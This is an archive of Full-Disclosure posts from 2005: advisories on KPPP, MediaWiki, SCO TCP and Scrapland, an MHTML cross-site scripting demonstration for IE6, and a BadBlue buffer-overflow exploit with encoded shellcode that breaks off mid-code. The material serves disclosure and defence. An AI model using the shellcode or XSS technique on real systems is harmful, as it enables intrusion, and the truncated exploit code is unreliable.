On Sun, 27 Feb 2005 01:19:34 +0100, William Waisse said: I already saw this problem switching from ctrl+alt+F7 to ctrl+alt+F8 from a F7 root X session to a F8 user X session, wher the user session sees the last root screen. Umm... what's stopping the user from looking at the F7 root session and getting the information *before* you hit alt-F8? If the user is there in time to see the vt7 session info before the X server wakes up and draws the vt8 pixels, they were probably in visual range before you did it too. Unless of course, ctl-alt-F8 is really your the boss is coming, hide the pr0n key sequence, in which case you *do* have a problem, but it's not the X server. :) pgpQIiYRZosOy.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[VulnDiscuss] Re: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit (update)
RE: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit (update)next time then publish both in same time because coded or not because of timeline , the exploit has been brought in first by hat-squad , sorry ; - class101 Jr. Researcher Hat-Squad.com - - Original Message - From: Andres Tarasco To: '[EMAIL PROTECTED]' Cc: 'full-disclosure@lists.netsys.com, [EMAIL PROTECTED]' Sent: Monday, February 28, 2005 11:18 AM Subject: RE: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit (update) Hole History: 26-2-2005: BOF flaw published by Andres Tarasco of sia.es 27-2-2002: Hat-Squad.com releases an exploit 28-2-2005: haxorcitos releases a dupe with fake date : or you sux doing private stuffs. Thats simply not true. Miguel Tarasco developed the first functional exploit for this vulnerability. This exploit was not published before because of disclosure Timeline. regards On Mon, 28 Feb 2005 09:42:11 +0100, class 101 [EMAIL PROTECTED] wrote: (reposting again with the hole history) Andres Tarasco of sia.es has published yesterday a security hole affecting BadBlue 2.5 and below. http://seclists.org/lists/fulldisclosure/2005/Feb/0704.html Hat-Squad.com brought you a fresh exploit. The exploit and BadBlue v2.5 are both available at class101.org for your exploitation's pratices, njoy :) /* BadBlue, Easy File Sharing Remote BOverflow Homepage: badblue.com Affected version: v2.5 (2.60 and below not tested) Patched version: v2.61 Link: badblue.com/bbs98.exe Date: 27 February 2005 Application Risk: Severely High Internet Risk:Low Dicovery Credits: Andres Tarasco (atarasco _at_ sia.es) Exploit Credits : class101 metasploit.com Hole History: 26-2-2005: BOF flaw published by Andres Tarasco of sia.es 27-2-2002: Hat-Squad.com releases an exploit 28-2-2005: haxorcitos releases a dupe with fake date : or you sux doing private stuffs. Notes: -6 bad chars, 0x00, 0x26, 0x20, 0x0A, 0x8C, 0x3C, badly interpreted by BadBlue -using offsets from ext.dll, universal. -use findjmp2 to quick search into ext.dll to see if the offsets changes in the others BadBlue's versions below 2.5 -if you need the v2.5 for exploitation's pratices, get it on class101.org -rename to .c for nux, haven't tested this one but it should works fine. Greet: Nima Majidi Behrang Fouladi Pejman Hat-Squad.com metasploit.com A^C^E of addict3d.org str0ke of milw0rm.com and my homy class101.org : */ #include stdio.h #include string.h #include time.h #ifdef WIN32 #include winsock2.h #pragma comment(lib, ws2_32) #else #include sys/socket.h #include sys/types.h #include netinet/in.h #include netinet/in_systm.h #include netinet/ip.h #include netdb.h #include arpa/inet.h #include unistd.h #include stdlib.h #include fcntl.h #endif char scode[]= /*XORed, I kiss metasploit.com because they are what means elite!*/ \x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x03 \x7b\x5b\x13\x83\xee\xfc\xe2\xf4\xff\x11\xb0\x5c\xeb\x82\xa4\xec \xfc\x1b\xd0\x7f\x27\x5f\xd0\x56\x3f\xf0\x27\x16\x7b\x7a\xb4\x98 \x4c\x63\xd0\x4c\x23\x7a\xb0\xf0\x33\x32\xd0\x27\x88\x7a\xb5\x22 \xc3\xe2\xf7\x97\xc3\x0f\x5c\xd2\xc9\x76\x5a\xd1\xe8\x8f\x60\x47 \x27\x53\x2e\xf0\x88\x24\x7f\x12\xe8\x1d\xd0\x1f\x48\xf0\x04\x0f \x02\x90\x58\x3f\x88\xf2\x37\x37\x1f\x1a\x98\x22\xc3\x1f\xd0\x53 \x33\xf0\x1b\x1f\x88\x0b\x47\xbe\x88\x3b\x53\x4d\x6b\xf5\x15\x1d \xef\x2b\xa4\xc5\x32\xa0\x3d\x40\x65\x13\x68\x21\x6b\x0c\x28\x21 \x5c\x2f\xa4\xc3\x6b\xb0\xb6\xef\x38\x2b\xa4\xc5\x5c\xf2\xbe\x75 \x82\x96\x53\x11\x56\x11\x59\xec\xd3\x13\x82\x1a\xf6\xd6\x0c\xec \xd5\x28\x08\x40\x50\x28\x18\x40\x40\x28\xa4\xc3\x65\x13\x5b\x76 \x65\x28\xd2\xf2\x96\x13\xff\x09\x73\xbc\x0c\xec\xd5\x11\x4b\x42 \x56\x84\x8b\x7b\xa7\xd6\x75\xfa\x54\x84\x8d\x40\x56\x84\x8b\x7b \xe6\x32\xdd\x5a\x54\x84\x8d\x43\x57\x2f\x0e\xec\xd3\xe8\x33\xf4 \x7a\xbd\x22\x44\xfc\xad\x0e\xec\xd3\x1d\x31\x77\x65\x13\x38\x7e \x8a\x9e\x31\x43\x5a\x52\x97\x9a\xe4\x11\x1f\x9a\xe1\x4a\x9b\xe0 \xa9\x85\x19\x3e\xfd\x39\x77\x80\x8e\x01\x63\xb8\xa8\xd0\x33\x61 \xfd\xc8\x4d\xec\x76\x3f\xa4\xc5\x58\x2c\x09\x42\x52\x2a\x31\x12 \x52\x2a\x0e\x42\xfc\xab\x33\xbe\xda\x7e\x95\x40\xfc\xad\x31\xec \xfc\x4c\xa4\xc3\x88\x2c\xa7\x90\xc7\x1f\xa4\xc5\x51\x84\x8b\x7b \xf3\xf1\x5f\x4c\x50\x84\x8d\xec\xd3\x7b\x5b\x13; char payload[1024]; char
[Full-Disclosure] Server termination in Scrapland 1.0
### Luigi Auriemma Application: Scrapland http://www.scrapland.com Versions: = 1.0 Platforms:Windows Bug: server termination Exploitation: remote, versus server (partially in-game) Date: 28 Feb 2005 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:http://aluigi.altervista.org ### 1) Introduction 2) Bug 3) The Code 4) Fix ### === 1) Introduction === Scrapland is the known game developed by MercurySteam Entertainment (http://www.mercurysteam.com) with the creative support of American McGee (http://www.americanmcgee.com). The game has been released at the beginning of 2005. ### == 2) Bug == The main problem of the game is that the server terminates after any error instead of simply showing the error message in the game console and continuing its work. This situation lets an attacker to easily crash a Scrapland game server in many ways, some of them are: - sizeSSize: the game uses 8 bits numbers to specify the size of the text strings inside the packets. These 8 bits numbers are handled as signed integers so any value bigger than 127 causes the server error. - unexistent model: if the client uses a model (like engine, pilot or player) not available on the server, this one will terminate saying that the model specified by the client has not been found. - newpos=size: another type of error. - access violation caused by the reception of two partial packets. If the server is full, is not possible to terminate it. ### === 3) The Code === http://aluigi.altervista.org/poc/scrapboom.zip ### == 4) Fix == No fix. No reply from the developers. ### --- Luigi Auriemma http://aluigi.altervista.org ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Possible XSS issue on Windows XPSP2 IE6 via MIME Encapsulation of Aggregate HTML
Dear bitlance winter, Using MHTML to bypass content filtering for scripting was at least reported here by offtopic as well as few more tricks. You may want to read this: offtopic, 3APA3A. Bypassing client application protection techniques http://www.security.nnov.ru/advisories/bypassing.asp and this 3APA3A. Bypassing content filtering whitepaper http://www.security.nnov.ru/advisories/content.asp --Monday, February 28, 2005, 6:11:31 PM, you wrote to full-disclosure@lists.netsys.com: bw Hi, LIST. bw bw subject: bw bw Possible XSS issue on Windows XPSP2 IE6 via MIME Encapsulation of Aggregate bw HTML Documents bw bw NOTE: bw bw This bug had been provided by an unknown person on his site. bw This bug is widely known in Japan since August, 2004. bw (These news was reported.) bw Now his site is closed. bw Some engineers prevented this bug. They are maintaining Web services. bw Wiki, Webmail, Blog, BBS, those might be dangerous. bw bw First: bw bw I want to show the following first. Please checkout using IE on XPSP2. bw The cat is here. bw http://freehost02.websamba.com/bitlance/mhtmlbug/scriptkitty.jpg bw And the cat is a script kitty. bw mhtml:http://freehost02.websamba.com/bitlance/mhtmlbug/scriptkitty.jpg bw You see? executing JavaScript? Ok. bw If you are using old IE or Windows, try this one. bw mhtml:http://freehost02.websamba.com/bitlance/mhtmlbug/scriptkitty.jpg.mhtml bw Confirmed? bw bw Second: bw bw What is happen to us? bw Please checkout. bw http://dsv.su.se/jpalme/ietf/mhtml-test/mhtml-3.txt bw or same file, bw http://freehost02.websamba.com/bitlance/mhtmlbug/q1.txt bw This is a test messages which demonstrate of sending e-mail bw in HTML format according to RFC 2557. bw And check out please. bw mhtml:http://dsv.su.se/jpalme/ietf/mhtml-test/mhtml-3.txt bw or same file, bw mhtml:http://freehost02.websamba.com/bitlance/mhtmlbug/q1.txt bw bw Third: bw bw Then we can change Content-Transfer-Encoding: bw from '7bit' to 'quoted-printable'. bw Checkout please. bw http://freehost02.websamba.com/bitlance/mhtmlbug/q2.txt bw - - q2.txt -- bw Content-Type: text/html; charset=us-ascii bw Content-Transfer-Encoding: quoted-printable bw =3C!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 3.2//EN=3E bw =3CHTML=3E bw =3CHEAD=3E=3CTITLE=3ETest message no. 3=3C/TITLE=3E bw =3C/HEAD=3E bw =3CBODY=3E bw =3CH1=3EThis is test message no. 3=3C/H1=3E bw =3CH2=3EHere comes the red test image:=3C/H2=3E bw =3CIMG bw SRC=3Dhttp://www.dsv.su.se/jpalme/mimetest/red-test-image.gif; bw BORDER=3D0 HEIGHT=3D32 WIDTH=3D117 bw ALT=3Dred test image=3E bw =3CH2=3EHere comes the yellow test image:=3C/H2=3E bw =3CIMG bw SRC=3Dhttp://www.dsv.su.se/jpalme/mimetest/yellow-test-image.gif; bw BORDER=3D0 HEIGHT=3D32 WIDTH=3D152 bw ALT=3Dyellow test image=3E bw =3CP=3EThis is the last line of this test message. bw =3C/BODY=3E=3C/HTML=3E bw - - q2.txt -- bw Where is HTML TAG? bw Do you know how to sanitise? bw mhtml:http://freehost02.websamba.com/bitlance/mhtmlbug/q2.txt bw The malicious code would be inserted by a malicious user, bw on Blog, Wiki, BBS with fileuploader ,etc. bw JPEG file or Gif file are also poisoned. bw There is possible XSS issue on Windows XPSP2 IE6 via MHTML. bw bw Reference: bw bw Using HTML in E-mail bw http://www.dsv.su.se/jpalme/ietf/mhtml.html bw MIME Encapsulation of Aggregate HTML Documents (MHTML) bw http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cdosys/html/_cdosys_mime_encapsulation_of_aggregate_html_documents_mhtml_.asp bw RFC 2045 - Multipurpose Internet Mail Extensions (MIME) Part One: Format of bw Internet Message Bodies bw http://www.faqs.org/rfcs/rfc2045.html bw === bw Sorry my bad English. bw Best Regards. bw === bw -- bw bitlance winter bw _ bw Dont just search. Find. Check out the new MSN Search! bw http://search.msn.click-url.com/go/onm00200636ave/direct/01/ bw ___ bw Full-Disclosure - We believe in it. bw Charter: http://lists.netsys.com/full-disclosure-charter.html -- ~/ZARAZA , . . () ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] iDEFENSE Security Advisory 02.28.05: KPPP Privileged File Descriptor Leak Vulnerability
KPPP Privileged File Descriptor Leak Vulnerability iDEFENSE Security Advisory 02.28.05 www.idefense.com/application/poi/display?id=208type=vulnerabilities February 28, 2005 I. BACKGROUND KPPP is a dialer and front end for pppd. It allows for interactive script generation and network setup. More information is available at: http://docs.kde.org/en/3.3/kdenetwork/kppp/ II. DESCRIPTION Local exploitation of a privileged file descriptor leak in KPPP can allow attackers to hijack a system's domain name resolution function. The vulnerability specifically exists due to kppp's failure to properly close privileged file descriptors. Typically, KPPP is installed setuid root and uses privilege separation to allow only certain functions of the PPP dialer to execute with elevated privileges. Communication between the privileged portion and non-privileged portion of kppp is done over a domain socket which does not properly get closed. A fix for a similar vulnerability was introduced to the kppp code base in 1998 as can be seen below: // close file descriptors for (int fd = 3; fd 20; fd++) close(fd); This fix may be easily bypassed if an attacker opens 17 file descriptors before executing kppp. The loop will execute, closing the previously opened file descriptors and leave the remaining privileged file descriptor used to talk to the privileged component of kppp open for attackers. KPPP may be abused to gain read and write access to /etc/hosts and /etc/resolv.conf, thus giving attackers complete control over a system's domain resolution capabilities. III. ANALYSIS Exploitation allows local attackers to gain control over a system's domain name resolution function. Exploitation is trivial and allows an attacker to write to the two files typically providing the configuration for domain name resolution. Modifications of /etc/resolv.conf will allow the attacker to specify a malicious domain server which may return arbitrary responses to domain name lookups. Modifications to /etc/hosts will cause hostname resolution redirection without the need for an external domain server. This class of attack can be used to aid in phishing and social engineering attempts. IV. DETECTION iDEFENSE has confirmed the existence of this vulnerability in KPPP 2.1.2. The vendor has confirmed that KPPP as included in KDE 3.1.5 and prior are affected. KDE 3.2.x and newer are not affected. Note that some Linux distributions which come with KPPP, such as Red Hat Linux, use a wrapper for executing X11 applications that require root privileges. This wrapper safely closes all file descriptors in the executed application. V. WORKAROUND As a workaround, temporarily remove the setuid bit from KPPP and manually gain root privileges before executing KPPP: chmod -s /usr/sbin/kppp VI. VENDOR RESPONSE A vendor advisory for this issue is available at: http://www.kde.org/info/security/advisory-20050228-1.txt A patch for KDE 3.1 is available from ftp://ftp.kde.org/pub/kde/security_patches : 0e999df54963edd5f565b6d541f408d9 post-3.1.5-kdenetwork.diff VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the names CAN-2005-0205 to these issues. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 02/09/2005 Initial vendor notification 02/09/2005 Initial vendor response 02/28/2005 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright (c) 2005 iDEFENSE, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [ GLSA 200502-33 ] MediaWiki: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200502-33 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low Title: MediaWiki: Multiple vulnerabilities Date: February 28, 2005 Bugs: #80729, #82954 ID: 200502-33 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis MediaWiki is vulnerable to cross-site scripting, data manipulation and security bypass attacks. Background == MediaWiki is a collaborative editing software, used by big projects like Wikipedia. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-apps/mediawiki 1.3.11= 1.3.11 Description === A security audit of the MediaWiki project discovered that MediaWiki is vulnerable to several cross-site scripting and cross-site request forgery attacks, and that the image deletion code does not sufficiently sanitize input parameters. Impact == By tricking a user to load a carefully crafted URL, a remote attacker could hijack sessions and authentication cookies to inject malicious script code that will be executed in a user's browser session in context of the vulnerable site, or use JavaScript submitted forms to perform restricted actions. Using the image deletion flaw, it is also possible for authenticated administrators to delete arbitrary files via directory traversal. Workaround == There is no known workaround at this time. Resolution == All MediaWiki users should upgrade to the latest available version: # emerge --sync # emerge --ask --oneshot --verbose =www-apps/mediawiki-1.3.11 References == [ 1 ] Secunia Advisory SA14125 http://secunia.com/advisories/14125/ [ 2 ] CAN-2005-0534 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0534 [ 3 ] CAN-2005-0535 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0535 [ 4 ] CAN-2005-0536 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0536 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200502-33.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] client - server
Am Montag, den 28.02.2005, 02:43 +0100 schrieb Matteo Giannone: Hi list, which informations can a server get about a client running M$ windows XP ? I cannot access a website because i have been banned and I'd like to understand how they recognize me for sure. [...] use a sniffer and find out ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] OpenServer 5.0.6 OpenServer 5.0.7 : A vulnerability in TCP
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 __ SCO Security Advisory Subject:OpenServer 5.0.6 OpenServer 5.0.7 : A vulnerability in TCP Advisory number:SCOSA-2005.3 Issue date: 2005 February 28 Cross reference:sr890248 fz529385 erg712599 CAN-2004-0230 __ 1. Problem Description TCP, when using a large Window Size, makes it easier for remote attackers to guess sequence numbers and cause a denial of service (connection loss) to persistent TCP connections by repeatedly injecting a TCP RST packet, especially in protocols that use long-lived connections, such as BGP. Paul Watson performed a statistical analysis of this attack when the ISN is not known and has pointed out that such an attack could be viable when specifically taking into account the TCP Window size. He has also created a proof-of-concept tool demonstrating the practicality of the attack. The National Infrastructure Security Co-Ordination Center (NISCC) has published an advisory summarizing Paul Watson's analysis in NISCC Vulnerability Advisory 236929. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2004-0230 to this issue. 2. Vulnerable Supported Versions System Binaries -- OpenServer 5.0.6TCP driver OpenServer 5.0.7TCP driver 3. Solution The proper solution is to install the latest packages. 4. OpenServer 5.0.7 4.1 Location of Fixed Binaries ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.3 4.2 Verification MD5 (VOL.000.000) = 0f3182ee23d7bd90359d7ac0973dd44e md5 is available for download from ftp://ftp.sco.com/pub/security/tools 4.3 Installing Fixed Binaries Upgrade the affected binaries with the following sequence: 1) Download the VOL* files to the /tmp directory 2) Run the custom command, specify an install from media images, and specify the /tmp directory as the location of the images. 5. OpenServer 5.0.6 5.1 Location of Fixed Binaries ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.3 5.2 Verification MD5 (VOL.000.000) = 0f3182ee23d7bd90359d7ac0973dd44e md5 is available for download from ftp://ftp.sco.com/pub/security/tools 5.3 Installing Fixed Binaries Upgrade the affected binaries with the following sequence: 1) Download the VOL* files to the /tmp directory 2) Run the custom command, specify an install from media images, and specify the /tmp directory as the location of the images. 6. References Specific references for this advisory: http://www.uniras.gov.uk/vuls/2004/236929/index.htm http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0230 http://www.us-cert.gov/cas/techalerts/TA04-111A.html SCO security resources: http://www.sco.com/support/security/index.html SCO security advisories via email http://www.sco.com/support/forums/security.html This security fix closes SCO incidents sr890248 fz529385 erg712599. 7. Disclaimer SCO is not responsible for the misuse of any of the information we provide on this website and/or through our security advisories. Our advisories are a service to our customers intended to promote secure installation and use of SCO products. 8. Acknowledgments SCO would like to thank The National Infrastructure Security Co-Ordination Centre (NISCC), Paul Watson and Tim Newsham. __ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.0 (SCO/UNIX_SVR5) iD8DBQFCIy37aqoBO7ipriERAqc3AJ9IwDOx3iRiSmJNqbHonAiL/MahBACcCLTn BffHZGatoqplBgcjoEgAvcA= =eNiU -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Possible XSS issue on Windows XPSP2 IE6 via MIME Encapsulation of Aggregate HTML
Dear 3APA3A. Thank you for your excelent information. offtopic, 3APA3A. Bypassing client application protection techniques http://www.security.nnov.ru/advisories/bypassing.asp 3APA3A. Bypassing content filtering whitepaper http://www.security.nnov.ru/advisories/content.asp These advisories are very very cool. ;) By the way, I have checkouted these Test descriptions. http://www.security.nnov.ru/files/opossum/test4.gif http://www.security.nnov.ru/files/opossum/test5.gif IE6 on Windows XPSP2 introduces a new setting under Tools-Internet Options-Security settings where we can choose to Disable Open files based on content, not file extension . Choosing Disable will make Internet Explore respect the Content Type at least in some circumstances. When we choose to Disable, neither opossum/test4.gif nor opossum/test5.gif are dangerous. But the script kitty is still dangerous. I am confused. :( (Unfortunately, this setting is not disabled by default in Internet Zone.) Thank you. Reference: Setting Changes in Service Pack 2 #MIME Sniffing File-Type Elevation http://www.microsoft.com/resources/documentation/ie/6/all/reskit/en-us/appendix.mspx Content Types - Web Developer Boot Camp http://bclary.com/2004/09/26/boot-camp-content-type FILE SIGNATURES TABLE http://www.garykessler.net/library/file_sigs.htm -- bitlance winter _ Dont just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Seeking anyone harmed by PivX Solutions
Regarding PivX Solutions: I would like to make contact with anyone who has been harmed by PivX Solutions. If you have been harmed by PivX Solutions, please contact me as soon as possible. Thanks. Jason Coombs [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Seeking anyone harmed by PivX Solutions
Regarding PivX Solutions: I would like to make contact with anyone who has been harmed by PivX Solutions. If you have been harmed by PivX Solutions, please contact me as soon as possible. Thanks. Jason Coombs [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html